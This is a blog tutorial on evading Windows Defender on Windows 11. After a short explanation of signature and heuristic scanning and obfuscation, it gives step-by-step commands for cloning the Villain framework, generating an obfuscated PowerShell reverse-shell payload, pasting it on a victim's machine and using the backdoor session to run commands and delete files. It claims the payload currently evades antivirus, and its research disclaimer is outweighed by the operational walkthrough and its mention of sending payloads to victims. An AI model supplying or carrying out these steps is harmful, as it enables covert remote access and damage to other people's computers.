Hey guys this is TheToySec back again with another Post. In this post we will demonstrate on bypass antivirus in Windows 11.
So before talking about the bypassing mechanism on Windows 11 let’s start to understand how antivirus works and how we could bypass it?
So How Does Antivirus Works?
Basically there are two common techniques which is used by an antivirus software to search for malicious software are heuristic and signature based scans. Normally, signature based scanning checks the form of a file, looking for strings and functions which match a known piece of malware. Heuristic based scanning looks at the function of a file, which use the algorithms and patterns to try to determine if the software is doing something suspicious.
How Antivirus can be bypassed?
There is a term called Obfuscation where the Antivirus can be bypassed, but remember it depends upon the scripts or code.
Obfuscation
Basically Obfuscation tries to make something more difficult to understand. It manipulates the malware whereas keeping its type. For an example it can be like randomizing the case of the characters in a PowerShell script or code. The function is the same, PowerShell doesn’t care or know about the case of the characters, however it’s going to fool simple signature based scanning.
Now It’s time for practical!
Step-1: Open terminal in Kali Linux and Download Villain from GitHub by t3l3machus:
git clone https://github.com/t3l3machus/Villain.git
Step-2: After installing the tool go to Villain folder by following command: cd Villain
Step-3: Now type ls to check the files. You’ll get to see there is a file which is Villain.py.
Step-4: Now to check the permission of the file you can type ls -l. Type chmod 777 or chmod +X in the terminal if the permission isn’t executable.
Step-5: Now type pip3 install -r requirements.txt to install required modules of Python.
All set for the test, now just type python3 Villain.py or ./Villain.py to run Villain.
Now you’ll get to see Hoxashell engine has been started to listen the connection.
Now type generate os=windows lhost=eth0 obfuscate in the terminal. You’ll get to see the PowerShell script or payload has been auto copied. So now you can send the payload or you can test in your environment to check whether it’s bypassing the Windows defender or not. So Let’s start now!
Now go to PowerShell in your victim’s Windows machine or your Windows lab environment and just paste that PowerShell Script or Payload and you’ll get to see the antivirus has been bypassed and can’t able to detect the script!
In this image you can also see the real time protection and windows defender is turned on but still it is unable to detect!
Now you’ll get to see the backdoor reverse connection has been established in Our Kali Linux or You can say in the attacker machine.
To interacting with the session type you should have to find the session id first. So to find session ID just type sessions. Now type shell and your session id to interact with your session ID.
For an example you can type whoami to see you’re interacting as which user. Also you can type systeminfo to see the system’s information and all and apart from this you can Perform any actions you want, like do switch directories by cd Downloads or any folders you want then you can delete it and you can do anything.
Disclaimer: Hackerinthehouse, it’s author, it’s affiliates and the developer of this tool won’t be responsible for any actions made by you. This article is just published for security research and education purposes only and we have tested it in a controlled simulated environment. It is the end user’s responsibility to obey all applicable local, state and federal laws.
Note: It’s currently bypassing the Windows defender as well as other antiviruses, but it may detected by the antiviruses in upcoming days or future.
If you really like this post then give your reaction and don’t forget to share with others. Till then we will meet again in another interesting topic.
Thank you for reading this and have a nice stay there!